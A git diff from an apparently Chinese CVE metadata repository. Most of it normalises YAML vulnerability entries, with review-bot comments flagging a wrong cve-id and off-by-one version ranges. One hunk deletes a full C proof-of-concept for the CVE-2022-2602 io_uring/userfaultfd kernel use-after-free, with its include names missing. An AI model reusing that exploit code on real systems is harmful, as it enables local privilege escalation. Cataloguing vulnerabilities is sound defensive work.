--- a/cve/java-spring/2022/yaml/CVE-2022-22965.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22965.yaml @@ -4,7 +4,8 @@ info: name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 severity: critical description: 2022年3月31日,Spring官方发布安全公告,披露CVE-2022-22965 Spring Framework 远程代码执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。 - scope-of-influence: Spring Framework <5.2.20 and JDK >=9 + scope-of-influence: + Spring Framework <5.2.20 and JDK >=9 reference: - https://help.aliyun.com/noticelist/articleid/1061022382.html - https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement diff --git a/cve/java-spring/2022/yaml/CVE-2022-31692.yaml b/cve/java-spring/2022/yaml/CVE-2022-31692.yaml index d6ed1a5e..2cf4e7e3 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-31692.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-31692.yaml @@ -4,7 +4,8 @@ info: name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。它提供了一组可以在Spring应用上下文中配置的Bean,充分利用了Spring IoC,DI(控制反转Inversion of Control ,DI:Dependency Injection 依赖注入)和AOP(面向切面编程)功能,为应用系统提供声明式的安全访问控制功能,减少了为企业系统安全控制编写大量重复代码的工作。 severity: critical description: CVE-2022-31692 中,在Spring Security受影响版本范围内,在使用forward/include进行转发的情况下可能导致权限绕过。 - scope-of-influence: 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8 + scope-of-influence: + 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-31692 - https://github.com/ARPSyndicate/cvemon diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml index 40166d53..a8b610b7 100644 --- a/cve/joomla/2023/yaml/CVE-2023-23752.yaml +++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml 
@@ -1,6 +1,5 @@ id: CVE-2023-23752 -source: - https://github.com/Jenderal92/Joomla-CVE-2023-23752 +source: https://github.com/Jenderal92/Joomla-CVE-2023-23752 info: name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。 severity: medium @@ -17,5 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - 非法访问 \ No newline at end of file + tags: 非法访问 \ No newline at end of file diff --git a/cve/libxml2/2020/yaml/CVE-2020-24977.yaml b/cve/libxml2/2020/yaml/CVE-2020-24977.yaml index edf411d2..53eb7456 100644 --- a/cve/libxml2/2020/yaml/CVE-2020-24977.yaml +++ b/cve/libxml2/2020/yaml/CVE-2020-24977.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2020,缓冲区错误 \ No newline at end of file + tags: cve2020, 缓冲区错误 \ No newline at end of file diff --git a/cve/libxml2/2021/yaml/CVE-2021-3517.yaml b/cve/libxml2/2021/yaml/CVE-2021-3517.yaml index d215f84e..82c243eb 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3517.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3517.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 中entities.c存在缓冲区错误漏洞,该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3517 classification: @@ -16,4 +16,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: cve2021,缓冲区错误 \ No newline at end of file + tags: cve2021, 缓冲区错误 \ No newline at end of file diff --git a/cve/libxml2/2021/yaml/CVE-2021-3518.yaml b/cve/libxml2/2021/yaml/CVE-2021-3518.yaml index 54dd1885..33a05a16 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3518.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3518.yaml 
@@ -6,7 +6,7 @@ info: description: | libxml2 中xinclude.c存在资源管理错误漏洞,该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3518 classification: diff --git a/cve/libxml2/2021/yaml/CVE-2021-3537.yaml b/cve/libxml2/2021/yaml/CVE-2021-3537.yaml index f2db176b..9302a380 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3537.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3537.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 存在代码问题漏洞,攻击者可利用该漏洞使应用程序崩溃。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3537 classification: diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml index 2442cf53..f22083e2 100644 --- a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml @@ -1,18 +1,18 @@ id: CVE-2011-4916 source: https://www.openwall.com/lists/oss-security/2011/11/05/3 info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: medium - description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 - scope-of-influence: - Linux kernel <= 3.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2011-4916 - cwe-id: CWE-200 - cnvd-id: None - kve-id: None - tags: information disclosure \ No newline at end of file + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4916 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file 
diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml index 255ddd17..d4817b05 100644 --- a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml @@ -1,18 +1,18 @@ id: CVE-2011-4917 source: https://www.openwall.com/lists/oss-security/2011/11/07/9 info: - name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 - severity: medium - description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 - scope-of-influence: - Linux kernel <= 3.1 - reference: - - https://nvd.nist.gov/vuln/detail/cve-2011-4917 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2011-4917 - cwe-id: CWE-200 - cnvd-id: None - kve-id: None - tags: information disclosure \ No newline at end of file + name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 + severity: medium + description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2011-4917 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4917 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml index 797969a3..40cfccc8 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml @@ -37,6 +37,7 @@ info: - https://usn.ubuntu.com/4117-1/ - https://usn.ubuntu.com/4118-1/ - https://www.debian.org/security/2019/dsa-4484 + classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2019-13272 
diff --git a/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml b/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml index 6a480aa9..c8a242be 100644 --- a/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml +++ b/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml @@ -2,7 +2,7 @@ id: CVE-2020-12351 source: https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 + severity: High description: | Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. scope-of-influence: diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml index 2be396cf..803cefb3 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml @@ -6,15 +6,17 @@ info: description: | Linux Netfilter模块在实现IPT_SO_SET_REPLACE(或IP6T_SO_SET_REPLACE)setsockopt时,存在堆越界写入漏洞。该漏洞将允许本地用户通过用户名空间获取权限提升,在kCTF中被用于攻击Kubernetes Pod容器,实现容器逃逸。该漏洞已在Linux内核代码中存在15年。 scope-of-influence: - v2.6.19-rc1~v5.12-rc7 + v2.6.19-rc1 ≤ Linux-Kernel ≤ v5.12-rc7 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2021-22555 - https://nvd.nist.gov/vuln/detail/CVE-2021-22555 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=9fa492cdc160cd27ce1046cb36f47d3b2b1efa21 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=b29c457a6511435960115c0f548c4360d5f4801d classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-22555 cwe-id: CWE-787 - tags: cve2021,权限提升,容器逃逸 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升, 容器逃逸 \ No newline at end of file 
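Review bot: The CVE-2020-12351 hunk translates `高危` to `High`, but the rest of the corpus spells severities in lowercase (`high`, `critical`, `medium` in the surrounding hunks), so this value would not match a case-sensitive filter; it should be `severity: high`. Fixing the Chinese value was the right call, but a format-normalisation commit is the place to pick one spelling for the enum and apply it everywhere.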
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml index e4014448..3355d61c 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml @@ -11,8 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/cve-2021-26708 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26708 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.0 cve-id: CVE-2021-26708 cwe-id: CWE-667 + cnvd-id: None + kve-id: None tags: 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml index 4c330eb4..1047549c 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml @@ -11,7 +11,7 @@ info: - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PAEQ3H6HKNO6KUCGRZVYSFSAGEUX23JL/ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CUX2CA63453G34C6KYVBLJXJXEARZI2X/ classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-29155 cwe-id: CWE-125 diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml index bdb280f2..e4d4734c 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml @@ -5,11 +5,9 @@ info: severity: medium description: | 在Linux内核的kernel/bpf/verifier.c 中,可以预测一个分支(例如,因为类型的混淆),因此一个非特权BPF程序可以通过边信道攻击读取任意内存位置,又名CID-9183671af6db。 - scope-of-influence: Red Hat Enterprise Linux 8 - Linux kernel before 5.12.13 - + Linux kernel < 5.12.13 reference: - https://access.redhat.com/security/cve/CVE-2021-33624 - https://ubuntu.com/security/CVE-2021-33624 
@@ -17,7 +15,6 @@ info: - https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html - https://github.com/torvalds/linux/commit/9183671af6dbf60a1219371d4ed73e23f43b49db - http://www.openwall.com/lists/oss-security/2021/06/21/1 - classification: cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.7 @@ -25,5 +22,4 @@ info: cwe-id: CWE-203 cnvd-id: None kve-id: None - tags: 内存泄露, 侧信道攻击 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml index f58af1c4..efe2294b 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml @@ -15,4 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2021-22555 cwe-id: CWE-120 - tags: cve2021,权限提升 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml index ade74c39..82972aa0 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml @@ -11,13 +11,15 @@ info: Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM - (Linux-kernel < 5.11) + Linux-kernel < 5.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3493 - https://ubuntu.com/security/notices/USN-4917-1 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3493 - cwe-id: CWE-269, CEW-270 - tags: cve2021,权限提升 \ No newline at end of file + cwe-id: CWE-269, CWE-270 + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml index 15bc9b53..05ed7647 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml 
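Review bot: The CVE-2021-33909 hunk touches the `classification:` block but leaves the context line `cve-id: CVE-2021-22555` in place, which is a copy-paste error from the Netfilter entry: this file is CVE-2021-33909 (the `id:` at the top of the file is outside the hunk, but the filename is unambiguous). The line should be `cve-id: CVE-2021-33909`; a wrong `cve-id` is the one field downstream tooling will key on, so it is worth fixing while the block is being edited. The `cwe-id: CWE-120` context line is presumably from the original import and was not re-checked here — confirm against the NVD entry when correcting the id.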
@@ -17,4 +17,6 @@ info: cvss-score: 8.8 cve-id: CVE-2021-4154 cwe-id: CWE-416 + cnvd-id: None + kve-id: None tags: cve2021, 内存错误引用 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml index e34d9dd1..92ccf20a 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml @@ -6,7 +6,7 @@ info: description: | The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access scope-of-influence: - Linux 2.1.94~v5.13.12 + Linux 2.1.94 < Linux-Kernel < v5.13.12 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42008 - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13 @@ -16,6 +16,6 @@ info: cvss-score: 7.8 cve-id: CVE-2021-42008 cwe-id: CWE-787 - cnvd-id: - kve-id: + cnvd-id: None + kve-id: None tags: 协议解码溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml index af36da21..004b603d 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml @@ -11,8 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-4204 - https://www.openwall.com/lists/oss-security/2022/01/11/4 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H cvss-score: 7.1 cve-id: CVE-2021-4204 - cwe-id: CWE-787, CEW-20 - tags: cve2021,权限提升 \ No newline at end of file + cwe-id: CWE-787, CWE-20 + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml index 883f6652..ad6af5fd 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml 
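Review bot: The new scope line in the CVE-2021-42008 hunk, `Linux 2.1.94 < Linux-Kernel < v5.13.12`, uses strict inequalities on both ends and so excludes 5.13.12, which the `description:` in the same hunk says is still vulnerable ("before 5.13.13"), as well as 2.1.94 itself; the old `2.1.94~v5.13.12` was an inclusive range. It should read `Linux 2.1.94 ≤ Linux-Kernel ≤ v5.13.12` (or `< v5.13.13`, matching the `ChangeLog-5.13.13` reference), using `≤` as the CVE-2021-22555 entry in this patch does. An off-by-one on the affected range is exactly the detail a scanner consuming these files will act on.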
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml @@ -5,13 +5,10 @@ info: severity: medium description: | Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。 - scope-of-influence: - Linux kernel before 5.14.14 - + Linux kernel < 5.14.14 reference: - https://nvd.nist.gov/vuln/detail/cve-2021-42327 - classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 6.7 @@ -19,5 +16,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: 缓冲区溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2602/README.md b/cve/linux-kernel/2022/CVE-2022-2602/README.md deleted file mode 100644 index ccaf80aa..00000000 --- a/cve/linux-kernel/2022/CVE-2022-2602/README.md +++ /dev/null @@ -1,6 +0,0 @@ -### 漏洞复现 -```shell -$ gcc poc.c -o poc -$ chmod +x ./poc -$ ./poc -``` \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2602/poc.c b/cve/linux-kernel/2022/CVE-2022-2602/poc.c deleted file mode 100644 index 89696fba..00000000 --- a/cve/linux-kernel/2022/CVE-2022-2602/poc.c +++ /dev/null 
@@ -1,174 +0,0 @@ -#define _GNU_SOURCE -#include -#include -#include -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -static int userfaultfd(int flags) -{ - return syscall(__NR_userfaultfd, flags); -} - -static char buffer[4096]; -static void fault_manager(int ufd) -{ - struct uffd_msg msg; - struct uffdio_copy copy; - read(ufd, &msg, sizeof(msg)); - if (msg.event != UFFD_EVENT_PAGEFAULT) - err(1, "event not pagefault"); - copy.dst = msg.arg.pagefault.address; - copy.src = (long) buffer; - copy.len = 4096; - copy.mode = 0; - copy.copy = 0; - sleep(2); - ioctl(ufd, UFFDIO_COPY, ©); - close(ufd); -} - -static char *bogus; - -static void start_ufd(int ufd) -{ - struct uffdio_api api; - struct uffdio_register reg; - - bogus = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - - api.api = UFFD_API; - api.features = 0; - api.ioctls = 0; - ioctl(ufd, UFFDIO_API, &api); - - reg.range.start = (long) bogus; - reg.range.len = 4096; - reg.mode = UFFDIO_REGISTER_MODE_MISSING; - reg.ioctls = 0; - - ioctl(ufd, UFFDIO_REGISTER, ®); -} - - -int sendfd(int s, int fd) -{ - struct msghdr msg; - char buf[4096]; - struct cmsghdr *cmsg; - int fds[1] = { fd }; - - memset(&msg, 0, sizeof(msg)); - memset(buf, 0, sizeof(buf)); - - msg.msg_control = buf; - msg.msg_controllen = sizeof(buf); - - cmsg = CMSG_FIRSTHDR(&msg); - cmsg->cmsg_level = SOL_SOCKET; - cmsg->cmsg_type = SCM_RIGHTS; - cmsg->cmsg_len = CMSG_LEN(sizeof(fds)); - memcpy(CMSG_DATA(cmsg), fds, sizeof(fds)); - - msg.msg_controllen = CMSG_SPACE(sizeof(fds)); - - sendmsg(s, &msg, 0); -} - -int io_uring_setup(int r, void *p) -{ - return syscall(__NR_io_uring_setup, r, p); -} - -int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig) -{ - return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig); -} - -int io_uring_register(unsigned int fd, unsigned int opcode, 
void *arg, unsigned int nr_args) -{ - return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args); -} - -int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring) -{ - struct io_uring_sqe *sqe; - io_uring_queue_mmap(fd, params, ring); - sqe = io_uring_get_sqe(ring); - sqe->opcode = IORING_OP_WRITEV; - sqe->fd = 1; - sqe->addr = (long) bogus; - sqe->len = 1; - sqe->flags = IOSQE_FIXED_FILE; -} - -int main(int argc, char **argv) -{ - int ufd; - pid_t manager; - - struct io_uring ring; - int fd; - struct io_uring_params *params; - int rfd[32]; - int s[2]; - int backup_fd; - - struct iovec *iov; - iov = (void *) buffer; - iov->iov_base = "hello, world!\n"; - iov->iov_len = 14; - - ufd = userfaultfd(0); - if (ufd < 0) - err(1, "userfaultfd"); - start_ufd(ufd); - - if ((manager = fork()) == 0) { - fault_manager(ufd); - exit(0); - } - close(ufd); - - socketpair(AF_UNIX, SOCK_DGRAM, 0, s); - - params = malloc(sizeof(*params)); - memset(params, 0, sizeof(*params)); - params->flags = IORING_SETUP_SQPOLL; - fd = io_uring_setup(32, params); - - rfd[0] = s[1]; - rfd[1] = open("null", O_RDWR | O_CREAT | O_TRUNC, 0644); - io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); - close(rfd[1]); - - sendfd(s[0], fd); - - close(s[0]); - close(s[1]); - - prepare_request(fd, params, &ring); - io_uring_submit(&ring); - - io_uring_queue_exit(&ring); - - sleep(1); - - close(socket(AF_UNIX, SOCK_DGRAM, 0)); - - wait(NULL); - wait(NULL); - - return 0; -} diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml index 4fa8b80c..0e6d5a3b 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml 
@@ -6,14 +6,16 @@ info: description: | Linux kernel 存在输入验证错误漏洞,该漏洞源于在 Linux kernel 的 Filesystem Context 中的 legacy_parse_param 函数验证提供的参数长度的方式中发现了一个基于堆的缓冲区溢出缺陷。 非特权(在启用非特权用户命名空间的情况下,否则需要命名空间的 CAP_SYS_ADMIN 特权)本地用户能够打开不支持文件系统上下文 API 的文件系统(因此回退到遗留处理)可以使用此缺陷来提升他们在系统上的权限。 scope-of-influence: - 5.1-rc1~5.16.2 + 5.1-rc1 ≤ Linux-Kernel ≤ 5.16.2 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0185 - https://nvd.nist.gov/vuln/detail/CVE-2022-0185 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.4 cve-id: CVE-2022-0185 cwe-id: CWE-190 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 权限提升, 容器逃逸, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml index 64fbf4c3..6ddbf77b 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml @@ -1,6 +1,5 @@ id: CVE-2022-0435 -source: - https://github.com/wlswotmd/CVE-2022-0435 +source: https://github.com/wlswotmd/CVE-2022-0435 info: name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用. severity: high diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml index 6d5a4c48..8e938907 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml 
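Review bot: The new upper bound `5.1-rc1 ≤ Linux-Kernel ≤ 5.16.2` in the CVE-2022-0185 scope line reads as if 5.16.2 were still vulnerable, while the commit linked two lines below it is the fix that stable 5.16.2 is generally understood to carry; if that is the first fixed release the bound should be exclusive, `5.1-rc1 ≤ Linux-Kernel < 5.16.2`, as the other rewritten scopes in this patch (CVE-2022-1015, CVE-2022-41218) already do for their fixed versions. Worth confirming against the NVD range before merging, since the whole point of this line is to let a reader decide whether a given kernel is affected. The same `≤` vs `<` question applies to `2.6.24-rc1 ≤ Linux-Kernel ≤ 5.17-rc3` in the CVE-2022-0492 hunk.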
@@ -2,18 +2,20 @@ id: CVE-2022-0492 source: https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 + severity: High description: | A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly. scope-of-influence: - 2.6.24-rc1~5.17-rc3 + 2.6.24-rc1 ≤ Linux-Kernel ≤ 5.17-rc3 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0492 - https://nvd.nist.gov/vuln/detail/CVE-2022-0492 - https://git.kernel.org/linus/24f6008564183aa120d07c03d9289519c2fe02af classification: - cvss-metrics: 